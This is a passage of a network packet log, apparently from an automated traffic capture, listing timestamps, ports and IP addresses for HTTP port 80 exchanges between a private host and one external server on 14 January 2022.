Jan 14, 2022 13:49:26.822757006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822774887 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822782040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822792053 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822808981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822819948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822828054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822845936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822860003 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822861910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822879076 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822890997 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822896957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822912931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822926998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822931051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822949886 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822953939 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822971106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822987080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822988033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823004961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823023081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823028088 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.823040009 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823055983 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.823059082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823075056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823091984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823108912 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823118925 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.823127031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823143959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823163986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823180914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823180914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.823198080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823215961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823220015 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.823232889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823246002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.823250055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.823276043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.823298931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.958611965 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.958642006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.958662033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.958679914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.958695889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.958744049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.958774090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965588093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965615034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965629101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965642929 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965662003 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965679884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965697050 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965715885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965715885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965733051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965753078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965753078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965771914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965786934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965789080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965807915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965820074 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965826035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965842009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965843916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965882063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965884924 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965899944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965917110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.965919018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.965950966 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.966008902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.966942072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.966965914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.966986895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967005014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967022896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967039108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967057943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967061043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967071056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967099905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967111111 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967128038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967155933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967166901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967184067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967221975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967227936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967243910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967259884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967262983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967289925 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967292070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967308998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967310905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967325926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.967348099 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.967382908 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968409061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968434095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968453884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968471050 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968487024 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968487978 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968588114 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968595982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968641996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968662024 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968681097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968697071 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968699932 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968714952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968730927 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968733072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968764067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968780994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968781948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968796968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968797922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968815088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968832970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968838930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968849897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968867064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968883991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968883991 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968900919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968909025 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968919992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968935966 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968943119 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968952894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968971014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.968977928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.968988895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969006062 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969017982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969022036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969039917 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969046116 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969057083 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969075918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969079018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969091892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969110012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969114065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969126940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969145060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969149113 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969161034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969176054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969178915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969197035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969213009 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969228983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969233036 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969235897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969247103 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969264030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969268084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969281912 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969297886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969305992 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969316006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969329119 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969333887 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969351053 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969364882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969367981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969383001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969386101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969403028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969419956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969427109 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969435930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969454050 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969463110 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969470978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969489098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969492912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969506979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969523907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969533920 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969541073 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969558001 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969568014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969573975 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969592094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969598055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969609022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969624996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969626904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969641924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.969665051 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.969702959 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.104048014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.104101896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.104142904 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.104171991 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.104186058 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.104206085 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.104221106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.104249954 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.104285002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.435801029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.588978052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589014053 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589040995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589063883 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589081049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589087963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589113951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589122057 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589138031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589163065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589188099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589200020 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589212894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589215040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589237928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589241982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589262009 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589276075 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589287043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589293003 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589312077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589335918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589343071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589354038 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589360952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589385986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589389086 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589411020 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589421988 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589432955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589436054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589458942 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589473009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589483023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589508057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589515924 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589524984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589533091 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589556932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589564085 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589581966 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589586973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589605093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589617968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589631081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589656115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589665890 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589673042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589679956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589708090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589708090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589732885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589737892 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589759111 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589770079 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589783907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589809895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589818001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589826107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589834929 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589843035 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589878082 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589884043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589911938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589936972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589943886 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589962959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.589978933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589984894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.589987993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590013027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590019941 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590039015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590049982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590065002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590079069 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590090990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590116024 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590125084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590137005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590142012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590158939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590167999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590193033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590197086 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590218067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590224028 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590243101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590267897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590267897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590284109 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590292931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590318918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590322018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590339899 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590342999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590369940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590375900 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590394974 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590415001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590419054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590435028 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590445995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590468884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590471983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590497017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590507984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590523958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590545893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590555906 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590564013 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590569973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:27.590584993 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:27.590624094 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:29.727824926 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:29.914783955 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:29.965423107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:29.970060110 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.576792955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.576948881 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.729258060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.729285002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.729332924 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.729408979 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877279043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877335072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877362967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877376080 CET	49743	80	192.168.2.3	108.167.165.140
